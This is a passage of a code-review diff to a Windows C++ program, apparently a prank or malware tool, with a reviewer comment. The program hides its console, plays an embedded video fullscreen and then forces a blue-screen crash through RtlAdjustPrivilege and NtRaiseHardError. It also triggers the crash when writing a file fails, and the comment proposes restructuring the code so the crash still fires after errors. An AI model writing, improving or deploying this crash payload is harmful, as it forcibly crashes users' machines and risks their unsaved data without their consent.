src/main.cpp

```diff
@@ -1,95 +1,111 @@
+        CloseHandle(file);
+        TriggerBSOD();
+        return;
+    }
+
+    // Close the file handle and free the resource
+    CloseHandle(file);
+    FreeResource(resource);
+}
 
-	// write the video data to the temporary path
-	WriteFile(file, data, size, &written, NULL);
-	CloseHandle(file);
+// Function to initialize DirectShow
+void InitializeDirectShow(LPCWSTR path) {
+    // Initialize COM
+    CoInitialize(NULL);
 
-	// free the resource
-	FreeResource(resource);
-}
+    // Create DirectShow objects
+    graph.reset();
+    CoCreateInstance(CLSID_FilterGraph, NULL, CLSCTX_INPROC_SERVER, IID_IGraphBuilder, (void**)&graph);
 
-void InitializeDirectShow(LPCWSTR* path) {
-	// initialize the COM
-	CoInitialize(NULL);
+    control.reset();
+    graph->QueryInterface(IID_IMediaControl, (void**)&control);
 
-	// create the filter graph manager
-	CoCreateInstance(CLSID_FilterGraph, NULL, CLSCTX_INPROC_SERVER, IID_IGraphBuilder, (void**)&graph);
+    event.reset();
+    graph->QueryInterface(IID_IMediaEvent, (void**)&event);
 
-	// get all needed addition interfaces
-	graph->QueryInterface(IID_IMediaControl, (void**)&control);
-	graph->QueryInterface(IID_IMediaEvent, (void**)&event);
-	graph->QueryInterface(IID_IVideoWindow, (void**)&window);
+    window.reset();
+    graph->QueryInterface(IID_IVideoWindow, (void**)&window);
 
-	// attempt to build the graph for file playback
-	graph->RenderFile(*path, NULL);
+    // Render the video file
+    graph->RenderFile(path, NULL);
 
-	// set the video window to fullscreen mode
-	window->put_FullScreenMode(OATRUE);
+    // Set video window to full screen mode
+    window->put_FullScreenMode(OATRUE);
 }
 
+// Function to trigger BSoD
 ULONG TriggerBSOD() {
-	BOOLEAN state;
-	ULONG response;
-
-	RtlAdjustPrivilege(19, TRUE, FALSE, &state); // adjust privileges to allow raising BSoD
-	NtRaiseHardError(0xdeadbeef, 0, 0, NULL, 6, &response); // raise BSoD
-
-	return response;
+    BOOLEAN state;
+    ULONG response;
+    RtlAdjustPrivilege(19, TRUE, FALSE, &state); // Adjust privileges
+    NtRaiseHardError(0xdeadbeef, 0, 0, NULL, 6, &response); // Raise BSoD
+    return response;
 }
 
-// main function
 int main() {
-	LPWSTR path = new WCHAR[MAX_PATH];
-	//WCHAR* path = L"C:\\Users\\bemxio\\AppData\\Local\\Temp\\video.wmv";
-
-	HRESULT result;
-	LONG code;
-	
-	ShowWindow(GetConsoleWindow(), SW_HIDE); // hide console window
-
-	GetVideoResource(&path); // get the video resource
-	InitializeDirectShow((LPCWSTR*)&path); // initialize directshow stuff
-
-	result = control->Run(); // play the video
-
-	if (SUCCEEDED(result)) {
-		event->WaitForCompletion(INFINITE, &code); // wait for video to finish
-	}
-
-	// trigger the blue screen of death
-	TriggerBSOD();
-
-	// if it gets here, the BSoD failed :(
-	return 1;
-}
\ No newline at end of file
+    LPWSTR path;
+    GetVideoResource(&path); // Get the video resource
+
+    try {
+        InitializeDirectShow(path); // Initialize DirectShow
```

Comment:
i think it would be better to check if the function failed here, make `InitializeDirectShow` return 1 if something inside it failed and then with just one if-check trigger the BSoD